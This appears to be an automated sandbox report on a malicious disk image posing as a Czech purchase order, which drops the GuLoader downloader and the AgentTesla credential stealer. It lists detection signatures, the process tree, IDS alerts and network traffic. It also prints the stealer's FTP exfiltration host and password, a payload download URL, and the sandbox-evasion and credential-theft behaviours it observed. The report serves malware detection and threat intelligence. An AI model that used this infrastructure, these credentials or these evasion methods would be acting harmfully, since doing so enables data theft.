Edit tour

Windows Analysis Report
Objedn#U00e1vka_20248481119000903.img

Overview

General Information

Sample name:	Objedn#U00e1vka_20248481119000903.img renamed because original name is a hash value
Original sample name:	Objednvka_20248481119000903.img
Analysis ID:	1566525
MD5:	8b2f7394817f048cb466ad9046458f3a
SHA1:	af12cb22f90f8ba4b84b7c8a2d691f66a800fc0f
SHA256:	f65bcb980c5bf774ba123d8cdede4a455e766c0b1935f3e0c892608fdc6f19b0
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Suspicious PowerShell Parameter Substring

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses FTP

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7212 cmdline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7300 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Objedn vka_20248481119000903.exe (PID: 7532 cmdline: "E:\Objedn vka_20248481119000903.exe" MD5: FFC86DFE93F81BCE26A2B4D2D818B167)

Objedn vka_20248481119000903.exe (PID: 7856 cmdline: "E:\Objedn vka_20248481119000903.exe" MD5: FFC86DFE93F81BCE26A2B4D2D818B167)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.2939013791.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2939013791.0000000034E01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2939013791.0000000034E01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.1997234959.000000000358F000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Objedn vka_20248481119000903.exe PID: 7532	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: Objedn vka_20248481119000903.exe PID: 7856	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Objedn vka_20248481119000903.exe PID: 7856	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7212, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), ProcessId: 7300, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7212, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt), ProcessId: 7300, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T11:36:18.961506+0100	2029927	1	A Network Trojan was detected	192.168.2.4	49737	86.107.36.93	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T11:36:20.106119+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49738	86.107.36.93	35334	TCP
2024-12-02T11:36:20.226620+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49738	86.107.36.93	35334	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-02T11:36:11.831801+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	185.33.55.26	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: conhost.exe.7256.1.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49738 -> 86.107.36.93:35334
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49737 -> 86.107.36.93:21

Source: global traffic

TCP traffic: 192.168.2.4:49738 -> 86.107.36.93:35334

Source: Joe Sandbox View

IP Address: 86.107.36.93 86.107.36.93

Source: Joe Sandbox View

ASN Name: DIALTELECOMRO DIALTELECOMRO

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 185.33.55.26:80

Source: unknown

FTP traffic detected: 86.107.36.93:21 -> 192.168.2.4:49737 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 13 of 80 allowed.220-Local time is now 11:36. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic

HTTP traffic detected: GET /image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: akonnyuszerkezet.huCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: akonnyuszerkezet.hu
Source: global traffic	DNS traffic detected: DNS query: ftp.carbognin.it

Source: Objedn vka_20248481119000903.exe, 00000009.00000002.2919321203.000000000499B000.00000004.00000020.00020000.00000000.sdmp, Objedn vka_20248481119000903.exe, 00000009.00000002.2919532261.0000000006410000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin
Source: Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: Objedn vka_20248481119000903.exe, 00000009.00000002.2939013791.0000000034E5C000.00000004.00000800.00020000.00000000.sdmp, Objedn vka_20248481119000903.exe, 00000009.00000002.2939013791.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.carbognin.it
Source: Objedn vka_20248481119000903.exe, 00000005.00000002.1996451858.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Objedn vka_20248481119000903.exe, 00000005.00000000.1682895809.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Objedn vka_20248481119000903.exe, 00000009.00000002.2916375841.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: Objedn vka_20248481119000903.exe, 00000009.00000002.2939013791.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Objedn#U00e1vka_20248481119000903.img, Objedn vka_20248481119000903.exe.2.dr	String found in binary or memory: https://sectigo.com/CPS0

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: \Device\CdRom1\Objedn vka_20248481119000903.exe

Jump to dropped file

Source: Objedn#U00e1vka_20248481119000903.img

Binary or memory string: OriginalFilenamesigmodontes.exeP vs Objedn#U00e1vka_20248481119000903.img

Source: classification engine

Classification label: mal100.troj.spyw.evad.winIMG@7/15@2/2

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\tmp.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Mutant created: NULL

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4lgqcbgh.glu.ps1

Jump to behavior

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
Source: unknown	Process created: \Device\CdRom1\Objedn vka_20248481119000903.exe "E:\Objedn vka_20248481119000903.exe"
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process created: \Device\CdRom1\Objedn vka_20248481119000903.exe "E:\Objedn vka_20248481119000903.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Process created: \Device\CdRom1\Objedn vka_20248481119000903.exe "E:\Objedn vka_20248481119000903.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: userenv.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: apphelp.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: propsys.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: oleacc.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: version.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: shfolder.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: wldp.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: profapi.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: riched20.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: usp10.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: msls31.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: wintypes.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: wintypes.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: wintypes.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: wininet.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: iertutil.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: sspicli.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: wldp.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: profapi.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: winhttp.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: mswsock.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: winnsi.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: urlmon.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: srvcli.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: netutils.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: mscoree.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: version.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: amsi.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: userenv.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: wintypes.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: rasman.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: rtutils.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Objedn#U00e1vka_20248481119000903.img

Static file information: File size 1572864 > 1048576

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: Objedn vka_20248481119000903.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: 00000005.00000002.1997234959.000000000358F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: \Device\CdRom1\Objedn vka_20248481119000903.exe	File created: C:\Users\user\AppData\Local\Temp\nsj41C4.tmp\System.dll			Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: \Device\CdRom1\Objedn vka_20248481119000903.exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
